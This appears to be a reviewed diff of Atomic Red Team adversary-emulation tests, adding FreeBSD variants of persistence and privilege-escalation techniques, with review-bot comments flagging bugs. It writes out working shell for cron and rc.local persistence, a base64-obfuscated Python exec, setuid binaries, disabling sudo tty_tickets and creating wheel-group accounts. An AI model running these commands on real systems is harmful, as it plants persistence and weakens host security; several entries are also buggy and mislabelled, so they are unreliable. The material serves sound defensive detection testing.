supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
sudo sh -c "echo Defaults "'!'"tty_tickets >> /usr/local/etc/sudoers"
|
||||
sudo visudo -c -f /usr/local/etc/sudoers
|
||||
T1574.011:
|
||||
technique:
|
||||
modified: '2023-03-30T21:01:38.651Z'
|
||||
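Review bot: the new "Disable tty_tickets for sudo caching (freebsd)" entry has no `cleanup_command`, so every run leaves an additional `Defaults !tty_tickets` line appended to `/usr/local/etc/sudoers` (the same gap exists in the timeout entry above this hunk). Since the description itself says this is dangerous to do without `visudo`, the entry should at least copy the file aside before the append and restore it in cleanup, and the `visudo -c -f` check should be documented as a post-condition rather than a safeguard, because it runs after the write.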
@@ -21218,9 +22091,8 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -21271,6 +22143,33 @@ privilege-escalation:
|
||||
rm /etc/cron.hourly/#{cron_script_name}
|
||||
rm /etc/cron.monthly/#{cron_script_name}
|
||||
rm /etc/cron.weekly/#{cron_script_name}
|
||||
- name: Cron - Add script to /etc/cron.d folder
|
||||
auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846'
|
||||
description: 'This test adds a script to /etc/cron.d folder configured to execute
|
||||
on a schedule.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
type: string
|
||||
default: echo '*/5 * * * * root echo "Hello
|
||||
from Atomic Red Team"' > /tmp/atomic.log
|
||||
cron_script_name:
|
||||
description: Name of file to store in cron folder
|
||||
type: string
|
||||
default: persistevil
|
||||
executor:
|
||||
elevation_required: true
|
||||
name: sh
|
||||
command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name}
|
||||
|
||||
'
|
||||
cleanup_command: 'rm /etc/cron.d/#{cron_script_name}
|
||||
|
||||
'
|
||||
- name: Cron - Add script to /var/spool/cron/crontabs/ folder
|
||||
auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
|
||||
description: 'This test adds a script to a /var/spool/cron/crontabs folder configured
|
||||
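Review bot: the default value of the `command` argument in "Cron - Add script to /etc/cron.d folder" is a shell line, `echo '*/5 * * * * root echo "Hello from Atomic Red Team"' > /tmp/atomic.log`, rather than a crontab entry, and the executor interpolates it inside double quotes (`echo "#{command}" > /etc/cron.d/#{cron_script_name}`), so the embedded `"Hello ... Team"` closes the outer quotes and the file written to `/etc/cron.d/persistevil` contains an `echo '...' > /tmp/atomic.log` line that cron cannot parse. The default should be the bare entry `*/5 * * * * root echo "Hello from Atomic Red Team" > /tmp/atomic.log`, and the executor should quote it so the inner double quotes survive (single quotes, or a heredoc). This entry is repeated under three tactics in the patch, so fix the shared definition once.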
@@ -23220,6 +24119,32 @@ privilege-escalation:
|
||||
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
|
||||
EXIT''
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f /tmp/art-fish.txt
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Trap EXIT (freebsd)
|
||||
auto_generated_guid: be1a5d70-6865-44aa-ab50-42244c9fd16f
|
||||
description: |
|
||||
Launch bash shell with command arg to create TRAP on EXIT.
|
||||
The trap executes script that writes to /tmp/art-fish.txt
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if bash is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y bash)\n"
|
||||
executor:
|
||||
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
|
||||
EXIT''
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f /tmp/art-fish.txt
|
||||
|
||||
@@ -23237,6 +24162,32 @@ privilege-escalation:
|
||||
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
|
||||
SIGINT && kill -SIGINT $$''
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f /tmp/art-fish.txt
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Trap SIGINT (freebsd)
|
||||
auto_generated_guid: ade10242-1eac-43df-8412-be0d4c704ada
|
||||
description: |
|
||||
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
|
||||
The trap executes script that writes to /tmp/art-fish.txt
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if bash is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y bash)\n"
|
||||
executor:
|
||||
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
|
||||
SIGINT && kill -SIGINT $$''
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f /tmp/art-fish.txt
|
||||
|
||||
@@ -23904,6 +24855,32 @@ privilege-escalation:
|
||||
sudo rm /tmp/hello.c
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Make and modify binary from C source (freebsd)
|
||||
auto_generated_guid: dd580455-d84b-481b-b8b0-ac96f3b1dc4c
|
||||
description: 'Make, change owner, and change file attributes on a C source code
|
||||
file
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
payload:
|
||||
description: hello.c payload
|
||||
type: path
|
||||
default: PathToAtomicsFolder/T1548.001/src/hello.c
|
||||
executor:
|
||||
command: |
|
||||
cp #{payload} /tmp/hello.c
|
||||
chown root /tmp/hello.c
|
||||
make /tmp/hello
|
||||
chown root /tmp/hello
|
||||
chmod u+s /tmp/hello
|
||||
/tmp/hello
|
||||
cleanup_command: |
|
||||
rm /tmp/hello
|
||||
rm /tmp/hello.c
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetUID flag on file
|
||||
auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79
|
||||
description: 'This test sets the SetUID flag on a file in FreeBSD.
|
||||
@@ -23927,6 +24904,28 @@ privilege-escalation:
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetUID flag on file (freebsd)
|
||||
auto_generated_guid: 9be9b827-ff47-4e1b-bef8-217db6fb7283
|
||||
description: 'This test sets the SetUID flag on a file in FreeBSD.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetUID flag
|
||||
type: path
|
||||
default: "/tmp/evilBinary"
|
||||
executor:
|
||||
command: |
|
||||
touch #{file_to_setuid}
|
||||
chown root #{file_to_setuid}
|
||||
chmod u+xs #{file_to_setuid}
|
||||
cleanup_command: 'rm #{file_to_setuid}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetGID flag on file
|
||||
auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c
|
||||
description: 'This test sets the SetGID flag on a file in Linux and macOS.
|
||||
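Review bot: the description of the new "Set a SetUID flag on file (freebsd)" entry is identical to the non-freebsd entry's description in the leading context ("This test sets the SetUID flag on a file in FreeBSD."), so the Linux/macOS entry now describes the wrong platform; align it with the SetGID entry at the end of this hunk ("in Linux and macOS") so the two variants are distinguishable in generated docs. The `supported_platforms: linux` tag on the freebsd variant is the same mislabelling noted on the sudo hunk above.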
@@ -23950,6 +24949,28 @@ privilege-escalation:
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetGID flag on file (freebsd)
|
||||
auto_generated_guid: 1f73af33-62a8-4bf1-bd10-3bea931f2c0d
|
||||
description: 'This test sets the SetGID flag on a file in FreeBSD.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetGID flag
|
||||
type: path
|
||||
default: "/tmp/evilBinary"
|
||||
executor:
|
||||
command: |
|
||||
touch #{file_to_setuid}
|
||||
chown root #{file_to_setuid}
|
||||
chmod g+xs #{file_to_setuid}
|
||||
cleanup_command: 'rm #{file_to_setuid}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Make and modify capabilities of a binary
|
||||
auto_generated_guid: db53959c-207d-4000-9e7a-cd8eb417e072
|
||||
description: |
|
||||
@@ -24003,7 +25024,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -4000
|
||||
@@ -24017,7 +25037,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -2000
|
||||
@@ -26940,6 +27959,26 @@ privilege-escalation:
|
||||
head -n '-2' ~/.bashrc > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bashrc
|
||||
name: sh
|
||||
- name: Add command to .shrc
|
||||
auto_generated_guid: 41502021-591a-4649-8b6e-83c9192aff53
|
||||
description: 'Adds a command to the .shrc file of the current user
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
command_to_add:
|
||||
description: Command to add to the .shrc file
|
||||
type: string
|
||||
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
|
||||
executor:
|
||||
command: 'echo ''#{command_to_add}'' >> ~/.shrc
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
head -n '-2' ~/.shrc > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.shrc
|
||||
name: sh
|
||||
- name: Append to the system shell profile
|
||||
auto_generated_guid: 694b3cc8-6a78-4d35-9e74-0123d009e94b
|
||||
description: 'An adversary may wish to establish persistence by executing malicious
|
||||
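Review bot: the cleanup for "Add command to .shrc" uses `head -n '-2' ~/.shrc > /tmp/T1546.004`, but a negative line count is a GNU head extension; FreeBSD's head rejects it ("illegal line count"), so the redirect leaves `/tmp/T1546.004` empty and the following `mv /tmp/T1546.004 ~/.shrc` replaces the user's `.shrc` with an empty file. Copy `~/.shrc` aside before the `>>` append and restore the copy in cleanup instead of trimming lines, and avoid reusing `/tmp/T1546.004`, which is also the marker file written by the default `command_to_add`.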
@@ -26947,7 +27986,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
text_to_append:
|
||||
@@ -26970,7 +28008,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
text_to_append:
|
||||
@@ -28466,6 +29503,27 @@ privilege-escalation:
|
||||
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
|
||||
sudo rm $origfilename;fi
|
||||
|
||||
'
|
||||
- name: rc.local (FreeBSD)
|
||||
auto_generated_guid: 2015fb48-8ab6-4fbf-928b-0b62de5c9476
|
||||
description: 'Modify rc.local
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
|
||||
printf '%s\n' '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local
|
||||
echo 'python3.9 -c "import os, base64;exec(base64.b64decode(\"aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo=\"))"' | sudo tee -a /etc/rc.local
|
||||
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
|
||||
sudo chmod +x /etc/rc.local
|
||||
cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
|
||||
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
|
||||
sudo rm $origfilename;fi
|
||||
|
||||
'
|
||||
T1134:
|
||||
technique:
|
||||
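Review bot: in "rc.local (FreeBSD)" the first executor line `printf '%s\n' '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local` writes the backslash literally, because inside single quotes `sh` does not strip `\!` (the escape is only needed under csh history expansion), so the file starts with `#\!/usr/local/bin/bash`, which is not a valid interpreter line; `/usr/local/bin/bash` is also a package path that a base FreeBSD install does not have, so if rc.local is ever executed directly rather than sourced by `/etc/rc.d/local`, it will not run. Use `/bin/sh` and drop the backslash. The second line also hard-codes `python3.9` with no `dependencies` block checking that a Python interpreter is installed, unlike the other freebsd entries in this patch that check for `bash` and `sudo`.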
@@ -28741,6 +29799,45 @@ privilege-escalation:
|
||||
rm -rf #{systemd_service_path}/#{systemd_service_file}
|
||||
systemctl daemon-reload
|
||||
name: bash
|
||||
- name: Create SysV Service
|
||||
auto_generated_guid: 760fe8d2-79d9-494f-905e-a239a3df86f6
|
||||
description: 'This test creates a SysV service unit file and enables it as a
|
||||
service.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
rc_service_path:
|
||||
description: Path to rc service file
|
||||
type: path
|
||||
default: "/usr/local/etc/rc.d"
|
||||
rc_service_file:
|
||||
description: File name of rc service file
|
||||
type: string
|
||||
default: art-test
|
||||
executor:
|
||||
command: "echo '#\\!/bin/sh' > #{rc_service_path}/#{rc_service_file}\necho
|
||||
' ' >> #{rc_service_path}/#{rc_service_file}\necho '#' >> #{rc_service_path}/#{rc_service_file}\necho
|
||||
'# PROVIDE: art-test' >> #{rc_service_path}/#{rc_service_file}\necho '#
|
||||
REQUIRE: LOGIN' >> #{rc_service_path}/#{rc_service_file}\necho '# KEYWORD:
|
||||
shutdown' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho
|
||||
'. /etc/rc.subr' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho
|
||||
'name=\"art_test\"' >> #{rc_service_path}/#{rc_service_file}\necho 'rcvar=art_test_enable'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho 'load_rc_config ${name}'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho 'command=\"/usr/bin/touch\"'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho 'start_cmd=\"art_test_start\"'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho '' >> #{rc_service_path}/#{rc_service_file}\necho
|
||||
'art_test_start()' >> #{rc_service_path}/#{rc_service_file} \necho '{'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho ' ${command} /tmp/art-test.marker'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho '}' >> #{rc_service_path}/#{rc_service_file}\necho
|
||||
' ' >> #{rc_service_path}/#{rc_service_file} \necho 'run_rc_command
|
||||
\"$1\"' >> #{rc_service_path}/#{rc_service_file}\nchmod +x #{rc_service_path}/#{rc_service_file}\nservice
|
||||
art-test enable\nservice art-test start\n"
|
||||
cleanup_command: |
|
||||
sysrc -x art_test_enable
|
||||
rm -f #{rc_service_path}/#{rc_service_file}
|
||||
name: sh
|
||||
- name: Create Systemd Service file, Enable the service , Modify and Reload the
|
||||
service.
|
||||
auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
|
||||
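Review bot: "Create SysV Service" is misnamed: the script it writes (`PROVIDE`/`REQUIRE`/`KEYWORD` headers, `. /etc/rc.subr`, `run_rc_command`) is a FreeBSD rc.d script, not a SysV init script, so the name and description should say so, and the `linux` platform tag is wrong for the same reason as the other freebsd entries. The entry also exposes `rc_service_file` as an input argument but hard-codes `art-test`/`art_test` in `PROVIDE`, `name=`, `rcvar=`, `service art-test enable`, `service art-test start` and the cleanup `sysrc -x art_test_enable`, so any value other than the default leaves a script whose filename, PROVIDE name and rcvar disagree and `service art-test` cannot find it; derive these from the argument or drop the argument. Cleanup should also remove `/tmp/art-test.marker`, which the service creates and nothing deletes.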
@@ -29711,6 +30808,39 @@ privilege-escalation:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: 'echo "#{at_command}" | at #{time_spec}'
|
||||
- name: At - Schedule a job freebsd
|
||||
auto_generated_guid: 549863fb-1c91-467e-97fc-1fa32b9f356b
|
||||
description: 'This test submits a command to be run in the future by the `at`
|
||||
daemon.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
time_spec:
|
||||
description: Time specification of when the command should run
|
||||
type: string
|
||||
default: now + 1 minute
|
||||
at_command:
|
||||
description: The command to be run
|
||||
type: string
|
||||
default: echo Hello from Atomic Red Team
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'The `at` executable must exist in the PATH
|
||||
|
||||
'
|
||||
prereq_command: 'which at
|
||||
|
||||
'
|
||||
get_prereq_command: 'echo ''Please install `at` ; they were not found in the
|
||||
PATH (Package name: `at`)''
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: 'echo "#{at_command}" | at #{time_spec}'
|
||||
T1055.001:
|
||||
technique:
|
||||
modified: '2022-10-18T21:07:23.748Z'
|
||||
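Review bot: style point on "At - Schedule a job freebsd": every other FreeBSD variant in this patch uses the `(freebsd)` suffix, so the name should match. The `get_prereq_command` message about installing package `at` is also misleading on FreeBSD, where at(1) is part of the base system; if the dependency is kept, the message should say the base utility is missing rather than point at a package.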
@@ -30036,6 +31166,23 @@ privilege-escalation:
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "userdel -r art \n"
|
||||
- name: Create local account (FreeBSD)
|
||||
auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
|
||||
description: 'An adversary may wish to create an account with admin privileges
|
||||
to work with. In this test we create a "art" user with the password art, switch
|
||||
to art, execute whoami, exit and delete the art user.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
|
||||
| pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n"
|
||||
cleanup_command: 'rmuser -y art
|
||||
|
||||
'
|
||||
- name: Reactivate a locked/expired account (Linux)
|
||||
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
|
||||
description: "A system administrator may have locked and expired a user account
|
||||
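Review bot: in "Create local account (FreeBSD)" the password is set on the wrong user: the executor runs `pw useradd art ...` and then `echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0`, so `testuser1` (which does not exist) is modified and the `art` account described as having "the password art" never gets one; the command should read `pw mod user art -h 0`. Because the executor runs as root, `su art` still succeeds and the test passes silently despite the error.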
@@ -30059,6 +31206,30 @@ privilege-escalation:
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "userdel -r art \n"
|
||||
- name: Reactivate a locked/expired account (FreeBSD)
|
||||
auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf'
|
||||
description: "A system administrator may have locked and expired a user account
|
||||
rather than deleting it. \"the user is coming back, at some stage\" An adversary
|
||||
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
|
||||
this test we create a \"art\" user with the password art, lock and expire
|
||||
the account, try to su to art and fail, unlock and renew the account, su successfully,
|
||||
then delete the account.\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
pw useradd art -g wheel -s /bin/sh
|
||||
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
|
||||
pw lock art
|
||||
pw usermod art -e +1d
|
||||
pw unlock art
|
||||
pw user mod art -e +99d
|
||||
su art
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "rmuser -y art \n"
|
||||
- name: Login as nobody (Linux)
|
||||
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
|
||||
description: 'An adversary may try to re-purpose a system account to appear
|
||||
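Review bot: the command sequence in "Reactivate a locked/expired account (FreeBSD)" does not do what the description says. `pw usermod art -e +1d` sets an expiry one day in the future, so the account is not expired; there is no `su art` attempt between `pw lock art` and `pw unlock art`, so the "try to su to art and fail" step is missing; and `pw mod user testuser1 -h 0` sets the password on a non-existent user instead of `art` (same copy error as the account-creation entry above). Use a past date for the expiry step, add the failing `su` attempt, and change the username to `art`.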
@@ -30077,6 +31248,26 @@ privilege-escalation:
|
||||
nobody\nsu nobody\nwhoami\nexit\n"
|
||||
cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep
|
||||
nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
|
||||
- name: Login as nobody (freebsd)
|
||||
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
|
||||
description: 'An adversary may try to re-purpose a system account to appear
|
||||
legitimate. In this test change the login shell of the nobody account, change
|
||||
its password to nobody, su to nobody, exit, then reset nobody''s shell to
|
||||
/usr/sbin/nologin.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged
|
||||
user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho
|
||||
$(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n"
|
||||
cleanup_command: |
|
||||
pw usermod nobody -s /usr/sbin/nologin
|
||||
cat /etc/passwd |grep nobody
|
||||
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
|
||||
T1574.012:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
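Review bot: in "Login as nobody (freebsd)" the description says the test changes the nobody account's password "to nobody", but the executor runs `openssl passwd -1 art`, so the password set is `art`; make one match the other. The expected-output comment in the command (`# -> nobody:x:65534:...`) also shows the Linux `x` password field, while the cleanup comment correctly shows FreeBSD's `*`; only the latter is right for `/etc/passwd` on FreeBSD.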
@@ -30849,9 +32040,8 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -30902,6 +32092,33 @@ execution:
|
||||
rm /etc/cron.hourly/#{cron_script_name}
|
||||
rm /etc/cron.monthly/#{cron_script_name}
|
||||
rm /etc/cron.weekly/#{cron_script_name}
|
||||
- name: Cron - Add script to /etc/cron.d folder
|
||||
auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846'
|
||||
description: 'This test adds a script to /etc/cron.d folder configured to execute
|
||||
on a schedule.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
type: string
|
||||
default: echo '*/5 * * * * root echo "Hello
|
||||
from Atomic Red Team"' > /tmp/atomic.log
|
||||
cron_script_name:
|
||||
description: Name of file to store in cron folder
|
||||
type: string
|
||||
default: persistevil
|
||||
executor:
|
||||
elevation_required: true
|
||||
name: sh
|
||||
command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name}
|
||||
|
||||
'
|
||||
cleanup_command: 'rm /etc/cron.d/#{cron_script_name}
|
||||
|
||||
'
|
||||
- name: Cron - Add script to /var/spool/cron/crontabs/ folder
|
||||
auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
|
||||
description: 'This test adds a script to a /var/spool/cron/crontabs folder configured
|
||||
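Review bot: same defect as the identical "/etc/cron.d" entry under `privilege-escalation` in this patch: the default `command` is an `echo '...' > /tmp/atomic.log` shell line, not a crontab entry, and the double-quoted interpolation in the executor breaks on the embedded `"Hello ... Team"`, so the file written to `/etc/cron.d/#{cron_script_name}` is not a valid cron table. Fix the shared definition once rather than per tactic.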
@@ -33103,7 +34320,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -33128,7 +34344,6 @@ execution:
|
||||
|
||||
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -33222,7 +34437,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -33242,7 +34456,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -33260,7 +34473,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -33275,7 +34487,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -33299,6 +34510,25 @@ execution:
|
||||
elevation_required: false
|
||||
command: "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n
|
||||
\"$ART\" |base64 -d |/bin/bash\nunset ART \n"
|
||||
- name: Obfuscated command line scripts (freebsd)
|
||||
auto_generated_guid: 5dc1d9dd-f396-4420-b985-32b1c4f79062
|
||||
description: 'An adversary may pre-compute the base64 representations of the
|
||||
terminal commands that they wish to execute in an attempt to avoid or frustrate
|
||||
detection. The following commands base64 encodes the text string id, then
|
||||
base64 decodes the string, then pipes it as a command to bash, which results
|
||||
in the id command being executed.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: |
|
||||
ART=$(echo -n "id" |b64encode -r -)
|
||||
echo "\$ART=$ART"
|
||||
echo -n "$ART" |b64decode -r |/bin/sh
|
||||
unset ART
|
||||
- name: Change login shell
|
||||
auto_generated_guid: c7ac59cb-13cc-4622-81dc-6d2fee9bfac7
|
||||
description: "An adversary may want to use a different login shell. The chsh
|
||||
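Review bot: the description of "Obfuscated command line scripts (freebsd)" says the decoded string is piped "as a command to bash", but the executor pipes it to `/bin/sh` (`echo -n "$ART" |b64decode -r |/bin/sh`); update the description, since bash is not part of the FreeBSD base and the change to `sh` is the point of the variant. The `supported_platforms: linux` tag is the same mislabelling noted earlier.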
@@ -33329,6 +34559,37 @@ execution:
|
||||
cat /etc/passwd |grep ^art
|
||||
cleanup_command: 'userdel art
|
||||
|
||||
'
|
||||
- name: Change login shell (freebsd)
|
||||
auto_generated_guid: 33b68b9b-4988-4caf-9600-31b7bf04227c
|
||||
description: "An adversary may want to use a different login shell. The chsh
|
||||
command changes the user login shell. The following test, creates an art user
|
||||
with a /bin/sh shell, changes the users shell to sh, then deletes the art
|
||||
user. \n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependencies:
|
||||
- description: 'chsh - change login shell, must be installed
|
||||
|
||||
'
|
||||
prereq_command: 'if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit
|
||||
1"; exit 1; fi
|
||||
|
||||
'
|
||||
get_prereq_command: 'echo "Automated installer not implemented yet, please
|
||||
install chsh manually"
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
pw useradd art -g wheel -s /bin/csh
|
||||
cat /etc/passwd |grep ^art
|
||||
chsh -s /bin/sh art
|
||||
cat /etc/passwd |grep ^art
|
||||
cleanup_command: 'rmuser -y art
|
||||
|
||||
'
|
||||
- name: Environment variable scripts
|
||||
auto_generated_guid: bdaebd56-368b-4970-a523-f905ff4a8a51
|
||||
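Review bot: the description of "Change login shell (freebsd)" says the test "creates an art user with a /bin/sh shell, changes the users shell to sh", which is a no-op, whereas the executor creates the user with `-s /bin/csh` and then runs `chsh -s /bin/sh art`; the description should state csh to sh. The dependency block is also redundant on FreeBSD, where `chsh` ships in the base system as a hard link of chpass(1), so `get_prereq_command` echoing "install chsh manually" can never be actionable; drop the dependency or make the check meaningful.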
@@ -33348,6 +34609,25 @@ execution:
|
||||
echo $ART |/bin/bash
|
||||
cleanup_command: 'unset ART
|
||||
|
||||
'
|
||||
- name: Environment variable scripts (freebsd)
|
||||
auto_generated_guid: 663b205d-2121-48a3-a6f9-8c9d4d87dfee
|
||||
description: 'An adversary may place scripts in an environment variable because
|
||||
they can''t or don''t wish to create script files on the host. The following
|
||||
test, in a bash shell, exports the ART variable containing an echo command,
|
||||
then pipes the variable to /bin/sh
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
